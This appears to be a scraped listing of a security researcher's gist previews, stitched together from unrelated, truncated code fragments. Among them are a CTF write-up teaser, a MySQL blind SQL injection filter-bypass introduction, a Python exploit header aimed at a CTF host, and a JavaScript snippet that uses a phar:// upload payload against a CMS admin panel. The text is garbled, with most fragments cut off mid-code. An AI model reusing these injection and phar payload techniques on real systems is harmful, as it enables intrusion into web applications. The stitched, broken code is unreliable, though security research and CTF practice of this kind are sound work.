Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
# derived from http://stackoverflow.com/questions/40046916/how-to-grant-permission-to-user-on-certificate-private-key-using-powershell | |
param ( | |
[string]$certThumbprint = "NothingToDoHere" | |
) | |
$serviceAccount = 'NETWORK SERVICE' | |
$permissionType = 'Read' | |
try | |
{ | |
Write-Host "Thumbprint: $certThumbprint" | |
#Clear Existing Variables |
#!/usr/bin/python -u | |
#-*-coding: utf-8-*- | |
def list_directory(expression): | |
try: | |
_c = __import__("glob").glob(expression + "/*") | |
for i in xrange(len(_c)): | |
if "uploads" not in _c[i] and "userimage" not in _c[i] and "files" not in _c[i]: | |
_c.extend(list_directory(_c[i])) | |
return _c | |
except: |
encryption-functions from mysql.com
ENCRYPT(x) 시 확률상 문제를 풀 수 없지만, salt 값을 설정하면 첫번째 몇 글자 정도는 같게 되므로 확률이 굉장히 줄어듬.
ENCRYPT(x,y) 출력시 나오는 값은 A-Za-z0-9./
로 이루어져있어서 확률상 어렵지만, 문제에서 strtolower($var)
로 인해 확률이 2차적으로 줄어들음.
iptables -N irccloud | |
iptables -A irccloud --src 192.184.9.108 -j ACCEPT | |
iptables -A irccloud --src 192.184.9.110 -j ACCEPT | |
iptables -A irccloud --src 192.184.9.112 -j ACCEPT | |
iptables -A irccloud --src 192.184.10.118 -j ACCEPT | |
iptables -A irccloud --src 192.184.10.9 -j ACCEPT | |
iptables -A irccloud --src 170.178.187.131 -j ACCEPT | |
iptables -A irccloud --src 192.184.8.73 -j ACCEPT | |
iptables -A irccloud --src 192.184.8.103 -j ACCEPT | |
iptables -A irccloud -j DROP |
#!/usr/bin/python -u | |
#-*- encoding: utf-8 -*- | |
import os | |
import sys | |
import requests | |
import json | |
from base64 import * | |
HOST = "core.eagle-jump.org" |
<?php | |
function generator() | |
{ | |
$PATH = "./s3cre7_fi1e"; | |
$init_seed = 0; | |
if(!file_exists(realpath($PATH))) | |
{ | |
$init_seed = $seed = intval(uniqid(),10); | |
$f = fopen($PATH,"w"); | |
fwrite($f,$init_seed); |
There are several ways to bypass blind SQLi filters,
and today I will introduce MySQL blind sqli payload using an insert()
function.
Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.
This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...
) are blocked by the script.
#!/usr/bin/python -u | |
#-*- coding: utf-8 -*- | |
# Developer: Harold Kim(root@stypr.com) | |
import os | |
import sys | |
import re | |
import requests | |
class iptime: |
// 업로드한 파일의 페이로드. | |
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
var payload = `[PAYLOAD_URL]` | |
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다. | |
$.get(`../qa_config.php`, function(d){ | |
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다. | |
if(d.indexOf(`상단 파일 경로`) !== false){ |